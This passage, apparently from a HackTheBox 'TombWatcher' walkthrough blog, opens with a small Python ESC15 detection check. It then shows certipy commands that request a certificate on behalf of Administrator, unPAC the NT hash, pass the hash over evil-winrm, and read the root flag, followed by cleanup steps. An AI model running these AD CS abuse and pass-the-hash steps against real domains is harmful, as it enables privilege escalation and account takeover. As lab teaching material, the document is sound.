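def grants_enrollment_agent(extn_value: bytes) -> bool:
    """Detection side: a certificate from a template like WebServer should never
    carry this policy; if it does, it can enroll on behalf of other users."""
    return CERTIFICATE_REQUEST_AGENT in decode_application_policies(extn_value)


if __name__ == "__main__":
    injected = encode_application_policies([CERTIFICATE_REQUEST_AGENT])
    print("extension", APPLICATION_POLICIES, "value:", injected.hex())
    print("policies:", decode_application_policies(injected))
    print("enrollment agent:", grants_enrollment_agent(injected))
```

To check a real certificate, extract the value of extension 1.3.6.1.4.1.311.21.10 (openssl x509 -text prints unknown extensions as hex; the cryptography library exposes them as UnrecognizedExtension) and pass the bytes to grants_enrollment_agent. On the CA side, an issued WebServer certificate with this policy in the certificate database is the ESC15 trace.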

The cert_admin.pfx file was also uploaded to the target with evil-winrm. This is not needed for what follows: the enrollment-agent certificate is used by certipy from the attacking host, and copying a private key onto the target only leaves an artifact to clean up.

*Evil-WinRM* PS C:\Users\john\Desktop> upload ./cert_admin.pfx
Info: Uploading /home/shiro/Documents/HackTheBox/Machines/TombWatcher/cert_admin.pfx to C:\Users\john\Desktop\cert_admin.pfx
Info: Upload successful!

Using cert_admin.pfx as the enrollment-agent certificate, a User-template certificate was then requested on behalf of tombwatcher\Administrator. This time the issued certificate carries Administrator's UPN and object SID, so it is usable for PKINIT logon.

➜ TombWatcher certipy-ad req -target tombwatcher.htb -dc-ip 10.10.11.72 -u 'cert_admin' -p 'password!' -ca tombwatcher-CA-1 -template User -pfx 'cert_admin.pfx' -on-behalf-of 'tombwatcher\Administrator'
[*] Request ID is 21
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator@tombwatcher.htb'
[*] Certificate object SID is 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Saving certificate and private key to 'administrator.pfx'

administrator.pfx was then used with certipy auth. PKINIT authentication with the certificate yields a TGT for Administrator, and certipy recovers the NT hash from the supplemental credentials in the PAC (the "UnPAC the hash" technique). Clock skew breaks PKINIT, hence the ntpdate first.

➜ TombWatcher sudo ntpdate tombwatcher.htb
➜ TombWatcher certipy-ad auth -dc-ip 10.10.11.72 -pfx administrator.pfx
[*] Using principal: 'administrator@tombwatcher.htb'
[*] Got hash for 'administrator@tombwatcher.htb': aad3b435b51404eeaad3b435b51404ee:f61db423bebe3328d33af26741afe5fc

The Administrator NT hash was passed to evil-winrm (pass-the-hash over WinRM) for a shell as Administrator.

➜ TombWatcher sudo evil-winrm -i tombwatcher.htb -u 'administrator' -H 'f61db423bebe3328d33af26741afe5fc'
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
f628d80838a6d74139ab0f5ea8694230

The root.txt flag was retrieved.

Cleanup

Everything changed in AD during the walkthrough should be reverted: Alfred's Infrastructure membership, the sam and john password resets, john's owner and the added GenericAll ACE, the restored cert_admin account, the uploaded cert_admin.pfx, and the two certificates issued (Request IDs 20 and 21), which a defender would revoke at the CA. The original passwords of sam and john are unknown, so those resets can only be reported, not undone.

# On the target as Administrator (via Evil-WinRM)
# cert_admin's original password is unknown: replace it, disable the account, then delete the restored object
Set-ADAccountPassword -Identity 'cert_admin' -Reset -NewPassword (ConvertTo-SecureString 'OriginalPasswordHere' -AsPlainText -Force)
Disable-ADAccount -Identity 'cert_admin'
Remove-ADObject -Identity 'CN=cert_admin,OU=ADCS,DC=tombwatcher,DC=htb' -Recursive:$true -WhatIf # Remove -WhatIf after testing

This post is licensed under CC BY 4.0 by the author.